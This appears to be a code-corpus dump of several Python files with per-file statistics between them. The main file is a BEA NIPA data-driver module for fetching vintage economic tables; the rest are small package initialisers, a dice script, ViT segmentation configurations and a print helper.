        self.metadata = [{
            "displayName": "Parameter of Dataset",
            "method": "GetParameterList",  # name of driver main function - run with getattr(data,'datasetlist')()
            "params": {},
        }]
class getNIPAVintageTables():
    '''
    Driver listing the NIPA vintage tables (non-API; fetched via vintageFns).
    '''
    def __init__(self, baseRequest=None, connectionParameters=None, userSettings=None):
        '''
        driver of list of NIPA vintage tables

        Args are kept for signature parity with the API drivers; they are
        currently unused (None sentinels replace the mutable {} defaults).
        '''
        # TODO: need to put a default url location
        # self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
        # self._baseRequest = _getBaseRequest(baseRequest,connectionParameters,userSettings)
        self._lastLoad = {}  # data stored here to assist other functions, acts as a clipboard
    def NIPAVintageTables(self, verbose=False):
        '''
        Get a list of NIPA Vintage tables (non-API)
        Sample run -
            NIPAVintageTables()
        Args:
            verbose (bool): if False return only a pandas dataframe, else all available information; default False
        Returns:
            output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code (empty code for now)
        '''
        listTables = vintageFns.urlNIPAHistQYVintage()
        output = self._cleanOutput(listTables)
        if not verbose:
            self._lastLoad = output['dataFrame']
            return output['dataFrame']
        else:
            output['request'] = listTables
            output['code'] = self._getCode()  # TODO: write code as method in class
            self._lastLoad = output
            return output
    def _cleanOutput(self, listTables):
        '''Split 'yearQuarter' into 'year'/'quarter' columns and parse 'releaseDate' in place.'''
        df_output = listTables
        df_output['year'] = df_output['yearQuarter'].apply(lambda x: x.split(',')[0].strip())
        df_output['quarter'] = df_output['yearQuarter'].apply(lambda x: x.split(',')[1].strip())
        df_output.drop('yearQuarter', axis=1, inplace=True)
        # pd.to_datetime(..., errors='ignore') is deprecated (removed in newer
        # pandas); replicate its behavior explicitly: on parse failure leave the
        # column unchanged.
        try:
            df_output['releaseDate'] = pd.to_datetime(df_output['releaseDate'])
        except (ValueError, TypeError):
            pass
        output = {'dataFrame': df_output}
        return output
    def clipcode(self):
        '''Copy the replay code of the last load to the clipboard.'''
        _clipcode(self)
    def _getCode(self):
        # placeholder until replay-code generation is implemented for this driver
        code = "to be written"
        return code
    def _driverMetadata(self):
        '''Populate self.metadata describing this driver's discoverable entry point.'''
        self.metadata = [{
            "displayName": "NIPAVintageTables",
            "method": "getNIPAVintageTables",  # name of driver main function - run with getattr(data,'datasetlist')()
            "params": {},
        }]
class getNIPAVintage():
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
'''
driver of list of NIPA vintage tables
'''
#TODO: need to put a default url location
#self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
#self._baseRequest = _getBaseRequest(baseRequest,connectionParameters,userSettings)
self._lastLoad = {} #data stored here to asist other function as clipboard
self._urlsOfQYRelease = pd.DataFrame() #a table of the url of data with same QY release. Will load via _getUrlsOfQYRelease if empty
self._urlsOfQueryQYRelease = pd.DataFrame() #table of urls of data with same QY release restricted to query of interest. Load via _queryUrlsOfQYRelease
self._urlsOfExcelTables = pd.DataFrame() #location of Excel tables of interest: type, Title, QY and ReleaseDate. Load with _getUrlsOfData
def NIPAVintage(self,tableName='',frequency='',type = 'main', Title = '',year='',quarter='',vintage = '',releaseDate='',reload=False,verbose=False,beaAPIFormat=False):
'''
Get a list of NIPA Vintage tables (non-API)
Sample run -
Args:
tableName (str): the name of a NIPA table of interest; will return all tables otherwise. Default to '', all tables.
frequency (str): A,Q or M. Returns all frequencies otherwise. Default to '', all frequencies
type (str): main, underlyning, MilsOfDollars. Defaults to main.
Title (str): Section 0, Section 1, etc.
vintage (str): Third, Second, Advance
year (str): string or numeric
quarter (str): Q1,...,Q4
releaseDate (str): will pick the first release date prior or equal to this. string or datetime eg datetime.now(), '2019-04-05', '04-05-2019', 'Apr-05-2019'
reload (bool): reloads getting the datatable by QY ReleaseDate
verbose (bool): False just returns a table with all data. Else, returns cleaned data, code, and returned query
Returns:
output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
'''
self._getUrlsOfData( type, Title,year,quarter,vintage,releaseDate,reload) #get the url of excel sheets with data given type, Title etc
self.array_output = vintageFns.getNIPADataFromListofLinks(self._urlsOfExcelTables)
self.clean_array = self._cleanExcelQuery(self.array_output,tableName,frequency,beaAPIFormat)
output = dict()
output['dataFrame'] = [ x['Results']['Data'] for x in self.clean_array ]
if not verbose:
self._lastLoad = output['dataFrame']
return(output['dataFrame'])
else:
output['code'] = 'none' #TODO: fix code
output['request'] = self.clean_array
self._lastLoad = output
return(output)
def _getUrlsOfQYRelease(self,reload=False):
if reload:
self._urlsOfQYRelease = getNIPAVintageTables().NIPAVintageTables()
elif self._urlsOfQYRelease.empty:
self._urlsOfQYRelease = getNIPAVintageTables().NIPAVintageTables()
def _queryUrlsOfQYRelease(self,year='',quarter='',vintage = '',releaseDate='',reload=False):
self._getUrlsOfQYRelease(reload)
df_output = self._urlsOfQYRelease.copy()
if not year == '':
year = str(year)
df_output = df_output.loc[df_output['year']==year]
if not quarter == '':
quarter = quarter.upper()
df_output = df_output.loc[df_output['quarter']==quarter]
if not vintage =='':
vintage = vintage.capitalize()
df_output = df_output.loc[df_output['vintage']==vintage]
if not releaseDate == '':
firstDate = df_output.loc[ df_output['releaseDate'] <= releaseDate]['releaseDate'].max()
df_output = df_output.loc[df_output['releaseDate'] == firstDate]
self._urlsOfQueryQYRelease = df_output
def _getURLsInQYRelease(self,tableLine):
self._urlsInQYRelease = vintageFns.urlNIPAHistQYVintageMainOrUnderlSection( tableLine )
df_output = pd.DataFrame()
for key,table in self._urlsInQYRelease.items():
table.insert(0,'type',key)
df_output = pd.concat([df_output, table ])
return(df_output)
def _getUrlsOfData(self,type = 'main', Title = '',year='',quarter='',vintage = '',releaseDate='',reload=False):
df_output = pd.DataFrame()
#get data the url inside the group with same QY and Release date,
# restrict by the given conditions
self._queryUrlsOfQYRelease(year,quarter,vintage,releaseDate,reload)
#Get the URLs inside each entry above, these are pointers to Excel files
for line in self._urlsOfQueryQYRelease.iterrows():
df_output = pd.concat([df_output, self._getURLsInQYRelease( line[1] ) ])
if not type == '':
type = type.lower()
df_output = df_output.loc[df_output['type']==type]
if not Title == '':
Title = Title.capitalize()
df_output = df_output.loc[df_output['Title']==Title]
self._urlsOfExcelTables = df_output
def _cleanOutput(self,listTables):
#TODO: break year/quarter in first column into year and quarter columns
df_output = listTables
df_output['year'] = df_output['yearQuarter'].apply(lambda x: x.split(',')[0].strip())
df_output['quarter'] = df_output['yearQuarter'].apply(lambda x: x.split(',')[1].strip())
df_output.drop('yearQuarter',axis=1,inplace=True)
df_output['releaseDate'] = pd.to_datetime(df_output['releaseDate'],errors='ignore')
output = {'dataFrame':df_output}
return(output)
def _cleanExcelQuery(self, arrayData, tableName='', frequency='', beaAPIFormat=False):
    '''
    Flatten an array of query results into per-sheet records.

    Args:
        arrayData (list[dict]): each entry contains metadata keys
            ('year', 'quarter', 'vintage', 'releaseDate', ...) plus a
            'data' dict mapping sheetName -> sheet.
        tableName (str): keep only sheets whose name contains this
            (case-insensitive); '' keeps all.
        frequency (str): keep only sheets whose name contains this
            (case-insensitive); '' keeps all.
        beaAPIFormat (bool): not used in this method.

    Returns:
        list[dict]: one record per kept sheet, combining the entry
        metadata with sheetName/tableID/frequency and the sheet itself.
    '''
    clean_array = []
    for entry in arrayData:
        baseInfo = {key: val for key, val in entry.items() if not key == 'data'}  # data that is not sheet
        # restrict to cases containing tableName and frequency
        if tableName == '' and frequency == '':
            subset = entry['data']
        else:
            subset = {key: val for key, val in entry['data'].items()
                      if tableName.lower() in key.lower() and frequency.lower() in key.lower()}
        subset = vintageFns.formatBeaRaw(subset)
        for sheetName, sheet in subset.items():
            sName = sheetName.split('_')
            table = sName[0]
            # BUGFIX: use a local name here.  The original assigned to the
            # `frequency` parameter, so the sheet-derived frequency of one
            # entry corrupted the subset filter of the following entries.
            try:
                sheetFrequency = sName[1]
            except IndexError:  # covers the case sheetName = 'Contents'
                sheetFrequency = ''
            # add basic info to the pandas table:
            sheet['Data'].insert(0, 'tableName', table)
            sheet['Data'].insert(1, 'yearQuarterVintage', '-'.join([entry['year'], entry['quarter'], entry['vintage']]))
            sheet['Data'].insert(2, 'releaseDate', entry['releaseDate'].strftime("%Y-%m-%d"))
            clean_array.append({**baseInfo,
                                **{'sheetName': sheetName, 'tableID': table, 'frequency': sheetFrequency},
                                **{'Results': sheet}})
    return clean_array
def clipcode(self):
    # Copy the code of the last load to the clipboard; delegates to the
    # module-level _clipcode helper.
    _clipcode(self)
def _getCode(self):
code = "to be written"
return(code)
def _driverMetadata(self):
self.metadata = [{
"displayName":"NIPAVintageTables",
"method" :"getNIPAVintageTables", #Name of driver main function - run with getattr(data,'datasetlist')()
"params" :{},
}]
class getNIPASummary():
    def __init__(self, baseRequest={}, connectionParameters={}, userSettings={}):
        '''
        Driver of the list of NIPA Account Summary tables.

        Args:
            baseRequest (dict): base parameters merged into every API request.
            connectionParameters (dict): connection overrides.
            userSettings (dict): user-level overrides.
        '''
        self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters=connectionParameters, userSettings=userSettings)
        self._baseRequest = _getBaseRequest(baseRequest, connectionParameters, userSettings)
        self._lastLoad = {}  # data stored here to assist other functions, as a clipboard
        self.cfgSummary = CFGnipaSummary.tabparams
        self.queryNIPA = getNIPA(baseRequest, connectionParameters, userSettings)
        self.queryNIPAVintage = getNIPAVintage()

    def NIPASummary(self, year, frequency, verbose=False):
        '''
        Overall view of NIPA data (non-API)
        Sample run -
          NIPASummary(2018,'Q')
        Args:
            frequency (str): A,Q or M. Returns all frequencies otherwise. Default to '', all frequencies
            year (str): string or numeric
            verbose (bool): False just returns a table with all data. Else, returns cleaned data, code, and returned query
        Returns:
            output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
        '''
        output = dict()
        output['request'] = self._getAccountTable(year, frequency)
        # put "Account # - sources/uses" as the column title to shorten the request output
        output['dataFrame'] = self._cleanRequest(output['request'])
        if verbose == False:
            return output['dataFrame']
        else:
            return output

    def _cleanRequest(self, requestResult):
        # Relabel the first column of every uses/sources table with the
        # account name, and return all tables in one flat list.
        df_array = []
        for key, entry in requestResult.items():
            useTable = entry['uses'].copy()
            sourceTable = entry['source'].copy()
            useCol = list(useTable.columns)
            sourceCol = list(sourceTable.columns)
            useCol[0] = key + ' uses'
            sourceCol[0] = key + ' sources'
            useTable.columns = useCol
            sourceTable.columns = sourceCol
            df_array.append(useTable)
            df_array.append(sourceTable)
        return df_array

    def _getAccountTable(self, year, frequency):
        # Query the uses and sources tables of every account in cfgSummary,
        # falling back to vintage (historical annual) data when the current
        # NIPA query fails.
        array_output = deepcopy(self.cfgSummary)  # use the structure of cfgSummary for the output
        for acct in self.cfgSummary:
            # Account 2 only has annual data.  BUGFIX: use a local variable;
            # the original reassigned the `frequency` parameter, forcing 'A'
            # onto every account processed after 'Account 2'.
            freq = 'A' if acct == 'Account 2' else frequency
            query = self.cfgSummary[acct]['source']  # TODO: query->queryUses querySources - one try - do source and uses at same time.
            query.update({'frequency': freq, 'year': year})
            try:
                array_output[acct]['source'] = self._getAccountUseOrSource(**query)
            except Exception:
                print('Could not find information of ' + acct + ' on current NIPA. Trying to query historical annual data.')
                array_output[acct]['source'] = self._getAccountUseOrSourceVintage(**query)
            query = self.cfgSummary[acct]['uses']
            query.update({'frequency': freq, 'year': year})
            try:
                array_output[acct]['uses'] = self._getAccountUseOrSource(**query)
            except Exception:
                print('Could not find information of ' + acct + ' on current NIPA. Trying to query historical annual data.')
                # BUGFIX: this fallback used to overwrite ['source']; it must
                # fill the 'uses' slot that was being queried.
                array_output[acct]['uses'] = self._getAccountUseOrSourceVintage(**query)
        return array_output

    def _getAccountUseOrSource(self, tableName, year, frequency, tableEntries):
        # Fetch one NIPA table and restrict it to the rows listed in
        # tableEntries, prefixing descriptions with dashes per indentation.
        readTable = self.queryNIPA.NIPA(tableName=tableName, frequency=frequency, year=year)
        readTable.reset_index(inplace=True)
        restrict = pd.DataFrame(tableEntries)
        output = pd.merge(restrict, readTable, on=['SeriesCode', 'SeriesCode'])
        output['LineDescription'] = output.apply(lambda x: x['indentation'] * '-' + x['LineDescription'], axis=1)
        output.drop(['indentation', 'LineNumber'], axis=1, inplace=True)
        output.set_index(['LineDescription', 'SeriesCode'], inplace=True)  # NOTE: this is just for sorting column order
        output.reset_index(inplace=True)
        return output

    def _getAccountUseOrSourceVintage(self, tableName, year, frequency, tableEntries, Title='Section 1', releaseDate=None):
        '''
        Try to get vintage data (try annual). Default is to check the last
        available vintage dataset from the current date.
        '''
        # BUGFIX: the default used to be releaseDate=datetime.now(), which is
        # evaluated only once, at class-definition time; resolve "now" per call.
        if releaseDate is None:
            releaseDate = datetime.now()
        readTable = self.queryNIPAVintage.NIPAVintage(tableName=tableName, frequency=frequency, Title=Title, releaseDate=releaseDate)
        readTable = readTable[0]
        # either the queried year or the last available year in the dataset, whichever is smaller
        year = str(min(year, int(readTable.columns[-1])))
        cols = ['Line', 'LineDescription', 'SeriesCode', year]
        readTable = readTable[cols]
        restrict = pd.DataFrame(tableEntries)
        output = pd.merge(restrict, readTable, on=['SeriesCode', 'SeriesCode'])
        output['LineDescription'] = output.apply(lambda x: x['indentation'] * '-' + x['LineDescription'], axis=1)
        output.drop(['indentation', 'Line'], axis=1, inplace=True)
        output.set_index(['LineDescription', 'SeriesCode'], inplace=True)  # NOTE: this is just for sorting column order
        output.reset_index(inplace=True)
        return output
if __name__ == '__main__':
    # Ad-hoc manual smoke test of the drivers; the commented-out lines below
    # are earlier experiments kept for reference.
    #from datapungibea.drivers import getNIPA
    #v = getNIPA()
    #v.NIPA('T10101')
    #from datapungibea.drivers import getNIPA #getDatasetlist
    #v = getNIPA() #getDatasetlist()
    #print(v.NIPA('T10101',verbose=True))
    ##print(v._lastLoad['code'])
    #from datapungibea.drivers import getGetParameterList #getDatasetlist
    #v = getGetParameterList()
    #print(v.getParameterList('NIPA',verbose = True)['code'])
    #
    #from datapungibea.drivers import getGetParameterValues #getDatasetlist
    #v = getGetParameterValues()
    #print(v.getParameterValues('NIPA','TableID'))
    #from datapungibea.drivers import getNIPAVintageTables
    #v = getNIPAVintageTables()
    #print(v.NIPAVintageTables())
    #listTables = vintageFns.urlNIPAHistQYVintage( )
    #print(listTables)
    #from datapungibea.drivers import *
    #v = getNIPAVintage()
    ##print(v._queryUrlsOfQYRelease(releaseDate='2019-04-01'))
    ##print(v._getUrlsOfData(releaseDate='2019-04-01'))
    #cases = v.NIPAVintage(tableName='T10101',frequency='Q',releaseDate = '2018-03-20')
    #print(cases)
    #v = getNIPASummary()
    #print(v.NIPASummary(2018,'Q'))
    #table indentations
    print(utils.getUserSettings())
    print(utils.getPkgConfig())
    v = getNIPA()
    #print(v.NIPA('T11000',includeIndentations=False))
    w= v.NIPA('T11000',verbose=True)
    print(w['code'])
    #print(w)
| 47.430055
| 205
| 0.601728
| 7,620
| 77,643
| 6.043438
| 0.07231
| 0.035265
| 0.034397
| 0.042192
| 0.740114
| 0.721895
| 0.702895
| 0.693123
| 0.682634
| 0.670756
| 0
| 0.003594
| 0.279768
| 77,643
| 1,636
| 206
| 47.459046
| 0.819907
| 0.272993
| 0
| 0.709647
| 0
| 0.006686
| 0.184426
| 0.045202
| 0
| 0
| 0
| 0.011614
| 0
| 1
| 0.092646
| false
| 0.020057
| 0.021012
| 0
| 0.13085
| 0.008596
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
13bd1bd0610170542ef6317cf8dbdf7d11de55e7
| 98
|
py
|
Python
|
pysal/__init__.py
|
anujaagarwal/pysal
|
8a6681744d73e3307f0b76013d906523f412a94e
|
[
"BSD-3-Clause"
] | null | null | null |
pysal/__init__.py
|
anujaagarwal/pysal
|
8a6681744d73e3307f0b76013d906523f412a94e
|
[
"BSD-3-Clause"
] | null | null | null |
pysal/__init__.py
|
anujaagarwal/pysal
|
8a6681744d73e3307f0b76013d906523f412a94e
|
[
"BSD-3-Clause"
] | 1
|
2016-11-11T19:20:51.000Z
|
2016-11-11T19:20:51.000Z
|
# Package initializer: expose the version string and the main subpackages.
__version__='2.0.0'
from . import lib
from . import explore
from . import viz
from . import model
| 16.333333
| 21
| 0.734694
| 16
| 98
| 4.25
| 0.5625
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.037037
| 0.173469
| 98
| 5
| 22
| 19.6
| 0.802469
| 0
| 0
| 0
| 0
| 0
| 0.05102
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
13e99c7ca34f971978415881bdaaa2b086402a5b
| 184
|
py
|
Python
|
.Python Challenges - 101Computing/Random Library Challenges/dice.py
|
Gustavo-daCosta/Projetos
|
459cbf6fc0b67532c1bf2043ccdb915d16ba0df2
|
[
"MIT"
] | 2
|
2021-09-13T22:04:30.000Z
|
2022-01-05T14:01:43.000Z
|
.Python Challenges - 101Computing/Random Library Challenges/dice.py
|
Gustavo-daCosta/Projetos
|
459cbf6fc0b67532c1bf2043ccdb915d16ba0df2
|
[
"MIT"
] | null | null | null |
.Python Challenges - 101Computing/Random Library Challenges/dice.py
|
Gustavo-daCosta/Projetos
|
459cbf6fc0b67532c1bf2043ccdb915d16ba0df2
|
[
"MIT"
] | null | null | null |
# Your task is to write a Python script to throw a dice by randomly generating a value between 1 and 6.
from random import randint
# NOTE(review): the label says "Number of dice generated" but the printed value
# is a single die roll (1-6) - consider rewording the message.
print(f'Number of dice generated: {randint(1, 6)}')
| 36.8
| 103
| 0.755435
| 34
| 184
| 4.088235
| 0.794118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02649
| 0.179348
| 184
| 5
| 104
| 36.8
| 0.89404
| 0.548913
| 0
| 0
| 1
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 5
|
b95d3ed200e7c6563acdd199dc38b4e0f81f7f5b
| 57
|
py
|
Python
|
kedro_mlflow/io/metrics/__init__.py
|
felipeeeantunes/kedro-mlflow
|
6d7023d7b859e4645053db39b2296a7d1ab67073
|
[
"Apache-2.0"
] | null | null | null |
kedro_mlflow/io/metrics/__init__.py
|
felipeeeantunes/kedro-mlflow
|
6d7023d7b859e4645053db39b2296a7d1ab67073
|
[
"Apache-2.0"
] | null | null | null |
kedro_mlflow/io/metrics/__init__.py
|
felipeeeantunes/kedro-mlflow
|
6d7023d7b859e4645053db39b2296a7d1ab67073
|
[
"Apache-2.0"
] | null | null | null |
from .mlflow_metrics_dataset import MlflowMetricsDataSet
| 28.5
| 56
| 0.912281
| 6
| 57
| 8.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.070175
| 57
| 1
| 57
| 57
| 0.943396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
b9d8366357ddd467e6499ac0d0ef1405c3d86917
| 112
|
py
|
Python
|
enthought/envisage/ui/workbench/workbench_application.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | 3
|
2016-12-09T06:05:18.000Z
|
2018-03-01T13:00:29.000Z
|
enthought/envisage/ui/workbench/workbench_application.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | 1
|
2020-12-02T00:51:32.000Z
|
2020-12-02T08:48:55.000Z
|
enthought/envisage/ui/workbench/workbench_application.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | null | null | null |
# proxy module
from __future__ import absolute_import
from envisage.ui.workbench.workbench_application import *
| 28
| 57
| 0.857143
| 14
| 112
| 6.428571
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098214
| 112
| 3
| 58
| 37.333333
| 0.891089
| 0.107143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
6a2230e56d804f8c917736dfbb8b1dafcabef3ef
| 4,279
|
py
|
Python
|
networks/vit_seg_configs.py
|
atch841/TransUNet
|
fa952b2f39e5dbc189fd3e0e6481bd1c74eb4c2c
|
[
"Apache-2.0"
] | null | null | null |
networks/vit_seg_configs.py
|
atch841/TransUNet
|
fa952b2f39e5dbc189fd3e0e6481bd1c74eb4c2c
|
[
"Apache-2.0"
] | null | null | null |
networks/vit_seg_configs.py
|
atch841/TransUNet
|
fa952b2f39e5dbc189fd3e0e6481bd1c74eb4c2c
|
[
"Apache-2.0"
] | null | null | null |
import ml_collections
def get_b16_config():
    """Returns the ViT-B/16 configuration."""
    config = ml_collections.ConfigDict()
    config.patches = ml_collections.ConfigDict({'size': (16, 16)})
    config.hidden_size = 768
    # transformer encoder hyper-parameters
    config.transformer = ml_collections.ConfigDict()
    config.transformer.mlp_dim = 3072
    config.transformer.num_heads = 12
    config.transformer.num_layers = 12
    config.transformer.attention_dropout_rate = 0.0
    config.transformer.dropout_rate = 0.1
    config.classifier = 'seg'
    config.representation_size = None
    # pretrained-weight locations (resnet path unused for the pure-ViT variant)
    config.resnet_pretrained_path = None
    config.pretrained_path = '../model/vit_checkpoint/imagenet21k/ViT-B_16.npz'
    config.patch_size = 16
    # segmentation-decoder settings
    config.decoder_channels = (256, 128, 64, 16)
    config.n_classes = 2
    config.activation = 'softmax'
    return config
def get_testing():
    """Returns a minimal configuration for testing."""
    cfg = ml_collections.ConfigDict()
    cfg.patches = ml_collections.ConfigDict({'size': (16, 16)})
    cfg.hidden_size = 1
    # smallest possible transformer: one of everything
    cfg.transformer = ml_collections.ConfigDict()
    for name, value in (('mlp_dim', 1),
                        ('num_heads', 1),
                        ('num_layers', 1),
                        ('attention_dropout_rate', 0.0),
                        ('dropout_rate', 0.1)):
        setattr(cfg.transformer, name, value)
    cfg.classifier = 'token'
    cfg.representation_size = None
    return cfg
def get_r50_b16_config():
    """Returns the Resnet50 + ViT-B/16 configuration."""
    config = get_b16_config()
    config.patches.grid = (16, 16)
    # ResNet backbone settings (truncated stage layout 3-4-9)
    config.resnet = ml_collections.ConfigDict()
    config.resnet.num_layers = (3, 4, 9)
    config.resnet.width_factor = 1
    config.classifier = 'seg'
    config.pretrained_path = '/home/viplab/data/R50+ViT-B_16.npz'
    config.decoder_channels = (256, 128, 64, 16)
    # channels of the skip connections fed to the decoder
    config.skip_channels = [512, 256, 64, 16]
    config.n_classes = 2
    config.n_skip = 3
    config.activation = 'softmax'
    return config
def get_b32_config():
    """Returns the ViT-B/32 configuration (B/16 with 32x32 patches)."""
    cfg = get_b16_config()
    cfg.patches.size = (32, 32)
    cfg.pretrained_path = '../model/vit_checkpoint/imagenet21k/ViT-B_32.npz'
    return cfg
def get_l16_config():
    """Returns the ViT-L/16 configuration."""
    config = ml_collections.ConfigDict()
    config.patches = ml_collections.ConfigDict({'size': (16, 16)})
    config.hidden_size = 1024
    # transformer encoder hyper-parameters
    config.transformer = ml_collections.ConfigDict()
    config.transformer.mlp_dim = 4096
    config.transformer.num_heads = 16
    config.transformer.num_layers = 24
    config.transformer.attention_dropout_rate = 0.0
    config.transformer.dropout_rate = 0.1
    config.representation_size = None
    # custom
    config.classifier = 'seg'
    config.resnet_pretrained_path = None
    config.pretrained_path = '../model/vit_checkpoint/imagenet21k/ViT-L_16.npz'
    # segmentation-decoder settings
    config.decoder_channels = (256, 128, 64, 16)
    config.n_classes = 2
    config.activation = 'softmax'
    return config
def get_r50_l16_config():
    """Returns the Resnet50 + ViT-L/16 configuration. customized """
    config = get_l16_config()
    config.patches.grid = (16, 16)
    # ResNet backbone settings (truncated stage layout 3-4-9)
    config.resnet = ml_collections.ConfigDict()
    config.resnet.num_layers = (3, 4, 9)
    config.resnet.width_factor = 1
    config.classifier = 'seg'
    # NOTE(review): this points at an R50+ViT-B_16 checkpoint inside an L/16
    # config - confirm the intended weights.
    config.resnet_pretrained_path = '../model/vit_checkpoint/imagenet21k/R50+ViT-B_16.npz'
    config.decoder_channels = (256, 128, 64, 16)
    # channels of the skip connections fed to the decoder
    config.skip_channels = [512, 256, 64, 16]
    config.n_classes = 2
    config.activation = 'softmax'
    return config
def get_l32_config():
    """Returns the ViT-L/32 configuration (L/16 with 32x32 patches)."""
    cfg = get_l16_config()
    cfg.patches.size = (32, 32)
    return cfg
def get_h14_config():
    """Returns the ViT-H/14 configuration."""
    config = ml_collections.ConfigDict()
    config.patches = ml_collections.ConfigDict({'size': (14, 14)})
    config.hidden_size = 1280
    # transformer encoder hyper-parameters
    config.transformer = ml_collections.ConfigDict()
    config.transformer.mlp_dim = 5120
    config.transformer.num_heads = 16
    config.transformer.num_layers = 32
    config.transformer.attention_dropout_rate = 0.0
    config.transformer.dropout_rate = 0.1
    config.classifier = 'token'
    config.representation_size = None
    return config
| 32.664122
| 90
| 0.702501
| 549
| 4,279
| 5.28051
| 0.156648
| 0.140738
| 0.111073
| 0.100034
| 0.852363
| 0.800966
| 0.770611
| 0.719214
| 0.719214
| 0.577096
| 0
| 0.065161
| 0.182286
| 4,279
| 130
| 91
| 32.915385
| 0.763361
| 0.07899
| 0
| 0.69
| 0
| 0
| 0.075897
| 0.058974
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.01
| 0
| 0.17
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
6a32529bc6243ff17b2615eddfe2d7b05bbcd621
| 96
|
py
|
Python
|
src/choice/__init__.py
|
xlurio/RockPaperScissorsPy
|
927bbd1480dbca70c9bc3b982f4034ac2ff33c57
|
[
"MIT"
] | null | null | null |
src/choice/__init__.py
|
xlurio/RockPaperScissorsPy
|
927bbd1480dbca70c9bc3b982f4034ac2ff33c57
|
[
"MIT"
] | null | null | null |
src/choice/__init__.py
|
xlurio/RockPaperScissorsPy
|
927bbd1480dbca70c9bc3b982f4034ac2ff33c57
|
[
"MIT"
] | null | null | null |
from .choice import Choice
from .player_vs_com_choices_factory import PlayerVsComChoicesFactory
| 32
| 68
| 0.895833
| 12
| 96
| 6.833333
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 96
| 2
| 69
| 48
| 0.931818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
6a38dc33e34f64a0cac342aa122642d15c5d3b79
| 63
|
py
|
Python
|
commons/message.py
|
Aigeruth/bazel-playground
|
4a62d91deb74bbd19e47cae9cdf7faec404be590
|
[
"MIT"
] | null | null | null |
commons/message.py
|
Aigeruth/bazel-playground
|
4a62d91deb74bbd19e47cae9cdf7faec404be590
|
[
"MIT"
] | null | null | null |
commons/message.py
|
Aigeruth/bazel-playground
|
4a62d91deb74bbd19e47cae9cdf7faec404be590
|
[
"MIT"
] | null | null | null |
def print_message(msg):
    """Print *msg* prefixed with the 'Message: ' label."""
    template = "Message: {:s}"
    print(template.format(msg))
| 21
| 38
| 0.650794
| 9
| 63
| 4.444444
| 0.666667
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126984
| 63
| 2
| 39
